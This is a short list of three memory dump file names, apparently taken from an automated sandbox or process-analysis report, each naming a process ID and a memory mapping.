memory/2480-148-0x0000000000000000-mapping.dmp
-
memory/2512-149-0x0000000000000000-mapping.dmp
-
memory/2544-150-0x0000000000000000-mapping.dmp